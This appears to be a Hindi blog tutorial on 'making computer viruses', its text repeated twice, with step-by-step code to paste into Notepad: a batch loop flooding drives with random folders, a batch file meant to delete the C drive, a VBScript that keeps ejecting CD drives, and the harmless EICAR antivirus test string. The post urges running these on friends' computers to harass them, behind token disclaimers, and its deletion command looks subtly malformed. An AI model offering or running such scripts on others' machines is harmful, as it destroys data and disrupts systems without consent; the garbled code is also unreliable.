हेलो दोस्तों हमारे पिछले पोस्ट में मैंने बताया था की वेबसाइट वायरस कैसे चेक करते हैं और आज हम कंप्यूटर वायरस कैसे बनाते हैं उसके बारे में सीखेंगे आज जो मैं ट्रिक्स बताने वाला हूं और सिर्फ एक सिंपल वायरस है फिर भी ये सिंपल वायरस से कोई भी हैरान परेशान हो सकता है। ये वायरस से सिर्फ कुछ ही सेकंड में कंप्यूटर ड्राइव में इतने सारे फोल्डर बन जाएंगे की आप कंफ्यूज हो जाएंगे।
ये ट्रिक का इस्तेमाल सबसे पहले आप अपने कंप्यूटर पे करके फिर अपने दोस्तों को परेशान करने के लिए ट्रिक का इस्तेमाल कर सकते हैं। इसलिए आज का टॉपिक स्टार्ट करते हैं आप मुझे स्टेप बाय स्टेप फॉलो करें।
Note 👉 ये सिर्फ एक मस्ती ट्रिक है इसलिए इसका कोई भी गलत इस्तेमाल के बारे में ना सोचे!
1.कंप्यूटर वायरस कैसे बनाएं
Step 1. सबसे पहले अपने कंप्यूटर में Notepad को ओपन करें।
Step 2. Notepad को ओपन करने के बाद नीचे दिए हुए कोड को कॉपी करें और Notepad में पेस्ट कर दीजिए।
Step 3. अब फाइल को Save करें। फ़ाइल .bat नाम से ही Save करना है।
Step 4. अब आपकी प्रोसेस पूरी हो चुकी है और आपका वायरस भी तैयार हो चुका है।
फाइल को बंद करें और डबल क्लिक करके फिर ओपन करें।
ये क्या !!! ओपन पर क्लिक करते ही आप देखोगे की एक साथ बहुत सारे फोल्डर अपने आप से क्रिएट होते जा रहे हैं और ये रुकने का नाम ही नहीं ले रहे है।
अब फिर से सारे फोल्डर को डिलीट कर के पहले जैसा करने के लिए Ctrl+A दबाये या सारे नये फोल्डर को सेलेक्ट करें। फिर Ctrl+D दबा कर के सारे फोल्डर को डिलीट कर दीजिए।
फोल्डर के साथ ही अपने वायरस फाइल .bat भी डिलीट कर दीजिए।
2. एक Dangerous वायरस कैसे बनाएं :
दोस्तों Dangerous वायरस क्या है आप तो समझते ही हैं इस वायरस से आप किसी के भी कंप्यूटर को खराब कर सकते हैं, जैसे कि अगर आप इस वायरस फाइल को किसी के भी कंप्यूटर पर जाकर ओपन करते हो तो उसके कंप्यूटर के "C Drive" रिमूव हो जाएगा।
Step 1. पहले आप Run पर जाकर Notepad लिखें उसके बाद Notepad को ओपन करें, ओपन करने के बाद जस्ट नीचे की कोड को Notepad पर कॉपी करके पेस्ट करें।
Step 2. अभी इस फाइल को virus.bat इस नाम से सेव करें।
Note 👉 दोस्तों आप इसको सिर्फ सीखने के लिए इस्तेमाल करें इस फाइल को अपने कंप्यूटर से ओपन मत करें, क्योंकि अगर आप इस फाइल को कंप्यूटर पर ओपन करोगे तो आपके PC के C Drive रिमूव हो जाएगा और आपके कंप्यूटर ओपन नहीं होगा।
3. हार्मल्सस Cdrom वायरस बनाएं :
दोस्तों ये बहुत ही फनी वायरस है अगर आप इस वायरस को आपके किसी दोस्त के कंप्यूटर पर एक बार ओपन कर दोगे तो उसका CD/DVD लगातार एजेक्टेड होता जाएगा, ये काम आप अपने कंप्यूटर पर मत करना।
Step 1. पहले अपने Notepad को ओपन करके उसके बाद नीचे की कोड को कॉपी करके पेस्ट करें।
Step 2. अभी आप इस फाइल को CD-ROM.vbs इस नाम से सेव करें अपने कंप्यूटर के किसी भी जगह और जब भी फाइल को ओपन करोगे आपके CD/ROM ड्राइव खुलते ही जाएगा।
Note👉 ऑफ करने के लिए आप "Task Manager" पर जाएं उसके बाद Process tab and end the wscript.exe फाइल पर क्लिक करके ऑफ करे।
4. अपने एंटीवायरस का परीक्षण करें :
दोस्तों अब जो वायरस मैं आप लोगों के साथ शेयर करूंगा इसके मदद से आप अपने एंटीवायरस को चेक कर सकोगे। इसका मतलब आप के कंप्यूटर पर अगर कोई एंटीवायरस है और आप जानना चाहते हैं कि वो एंटीवायरस ठीक से काम कर रहा है या नहीं तो इस वायरस के मदद से आप टेस्ट कर सकते हैं।
Step 1. पहले आप Notepad ओपन करें, उसके बाद नीचे की कोड को नोटपैड पर कॉपी करके पेस्ट करें।
Step 2. अभी आप इस फाइल को EICAR.COM इस नाम से सेव करें।
Note 👉 आप जब इस फाइल को Save करोगे तब आपके एंटीवायरस इस वायरस को रिमूव कर देगा, अगर रिमूव नहीं कर पाता है इसका मतलब आप के एंटीवायरस ठीक काम नहीं कर रहा है।
वायरस हैकिंग क्या है और कौन से तरीकों से हैकिंग सीख सकते हैं ?
वायरस हैकिंग और कंप्यूटर हैकिंग क्या है ? Programming languages के जरिए अगर हम कोई Batch Script या कोई गलत नुकसान वाले कोडिंग से Script Create करे तो उससे वायरस बनाना कहते हैं। इस प्रकार के वायरस अलग-अलग होते हैं।
कोई वायरस सिस्टम को हैंग करने के लिए तो कोई वायरस मोबाइल कंप्यूटर को नुकसान पहुंचाने के लिए बनाए जाते हैं। हैकिंग एक बहुत बड़ा विषय है जिसके बारे में हम इस पोस्ट में नहीं सीख सकते इसलिए हम मैं हाइकिंग के लिए स्पेशली हैकिंग सीरीज स्टार्ट की है जिसे आप यहां से पढ़ सकते हैं।
मुझे उम्मीद है की आपको ये ट्रिक्स जरूर पसंद आया होगा। आप दूसरे लोगों के साथ ये ट्रिक को शेयर भी जरूर करेंगे। किसी भी स्टेप में कोई प्रॉब्लम आए तो कमेंट करके बता सकते हैं। मिलते हैं अपनी अगले पोस्ट में तब तक अपना ध्यान रखें! Thank You !
1.कंप्यूटर वायरस कैसे बनाएं
Step 1. सबसे पहले अपने कंप्यूटर में Notepad को ओपन करें।
Step 2. Notepad को ओपन करने के बाद नीचे दिए हुए कोड को कॉपी करें और Notepad में पेस्ट कर दीजिए।
@echo off
:VIRUS
cd /d C:
md %RANDOM%
cd /d D:
md %RANDOM%
cd /d E:
md %RANDOM%
goto VIRUS
Step 3. अब फाइल को Save करें। फ़ाइल .bat नाम से ही Save करना है।
Step 4. अब आपकी प्रोसेस पूरी हो चुकी है और आपका वायरस भी तैयार हो चुका है।
फाइल को बंद करें और डबल क्लिक करके फिर ओपन करें।
ये क्या !!! ओपन पर क्लिक करते ही आप देखोगे की एक साथ बहुत सारे फोल्डर अपने आप से क्रिएट होते जा रहे हैं और ये रुकने का नाम ही नहीं ले रहे है।
अब फिर से सारे फोल्डर को डिलीट कर के पहले जैसा करने के लिए Ctrl+A दबाये या सारे नये फोल्डर को सेलेक्ट करें। फिर Ctrl+D दबा कर के सारे फोल्डर को डिलीट कर दीजिए।
फोल्डर के साथ ही अपने वायरस फाइल .bat भी डिलीट कर दीजिए।
2. एक Dangerous वायरस कैसे बनाएं :
दोस्तों Dangerous वायरस क्या है आप तो समझते ही हैं इस वायरस से आप किसी के भी कंप्यूटर को खराब कर सकते हैं, जैसे कि अगर आप इस वायरस फाइल को किसी के भी कंप्यूटर पर जाकर ओपन करते हो तो उसके कंप्यूटर के "C Drive" रिमूव हो जाएगा।
Step 1. पहले आप Run पर जाकर Notepad लिखें उसके बाद Notepad को ओपन करें, ओपन करने के बाद जस्ट नीचे की कोड को Notepad पर कॉपी करके पेस्ट करें।
@Echo off
Del C: *.* |y
Step 2. अभी इस फाइल को virus.bat इस नाम से सेव करें।
Note 👉 दोस्तों आप इसको सिर्फ सीखने के लिए इस्तेमाल करें इस फाइल को अपने कंप्यूटर से ओपन मत करें, क्योंकि अगर आप इस फाइल को कंप्यूटर पर ओपन करोगे तो आपके PC के C Drive रिमूव हो जाएगा और आपके कंप्यूटर ओपन नहीं होगा।
3. हार्मल्सस Cdrom वायरस बनाएं :
दोस्तों ये बहुत ही फनी वायरस है अगर आप इस वायरस को आपके किसी दोस्त के कंप्यूटर पर एक बार ओपन कर दोगे तो उसका CD/DVD लगातार एजेक्टेड होता जाएगा, ये काम आप अपने कंप्यूटर पर मत करना।
Step 1. पहले अपने Notepad को ओपन करके उसके बाद नीचे की कोड को कॉपी करके पेस्ट करें।
Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
Step 2. अभी आप इस फाइल को CD-ROM.vbs इस नाम से सेव करें अपने कंप्यूटर के किसी भी जगह और जब भी फाइल को ओपन करोगे आपके CD/ROM ड्राइव खुलते ही जाएगा।
Note👉 ऑफ करने के लिए आप "Task Manager" पर जाएं उसके बाद Process tab and end the wscript.exe फाइल पर क्लिक करके ऑफ करे।
4. अपने एंटीवायरस का परीक्षण करें :
दोस्तों अब जो वायरस मैं आप लोगों के साथ शेयर करूंगा इसके मदद से आप अपने एंटीवायरस को चेक कर सकोगे। इसका मतलब आप के कंप्यूटर पर अगर कोई एंटीवायरस है और आप जानना चाहते हैं कि वो एंटीवायरस ठीक से काम कर रहा है या नहीं तो इस वायरस के मदद से आप टेस्ट कर सकते हैं।
Step 1. पहले आप Notepad ओपन करें, उसके बाद नीचे की कोड को नोटपैड पर कॉपी करके पेस्ट करें।
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Step 2. अभी आप इस फाइल को EICAR.COM इस नाम से सेव करें।
Note 👉 आप जब इस फाइल को Save करोगे तब आपके एंटीवायरस इस वायरस को रिमूव कर देगा, अगर रिमूव नहीं कर पाता है इसका मतलब आप के एंटीवायरस ठीक काम नहीं कर रहा है।
वायरस हैकिंग क्या है और कौन से तरीकों से हैकिंग सीख सकते हैं ?
वायरस हैकिंग और कंप्यूटर हैकिंग क्या है ? Programming languages के जरिए अगर हम कोई Batch Script या कोई गलत नुकसान वाले कोडिंग से Script Create करे तो उससे वायरस बनाना कहते हैं। इस प्रकार के वायरस अलग-अलग होते हैं।
कोई वायरस सिस्टम को हैंग करने के लिए तो कोई वायरस मोबाइल कंप्यूटर को नुकसान पहुंचाने के लिए बनाए जाते हैं। हैकिंग एक बहुत बड़ा विषय है जिसके बारे में हम इस पोस्ट में नहीं सीख सकते इसलिए हम मैं हाइकिंग के लिए स्पेशली हैकिंग सीरीज स्टार्ट की है जिसे आप यहां से पढ़ सकते हैं।
मुझे उम्मीद है की आपको ये ट्रिक्स जरूर पसंद आया होगा। आप दूसरे लोगों के साथ ये ट्रिक को शेयर भी जरूर करेंगे। किसी भी स्टेप में कोई प्रॉब्लम आए तो कमेंट करके बता सकते हैं। मिलते हैं अपनी अगले पोस्ट में तब तक अपना ध्यान रखें! Thank You !
Post a Comment
0Comments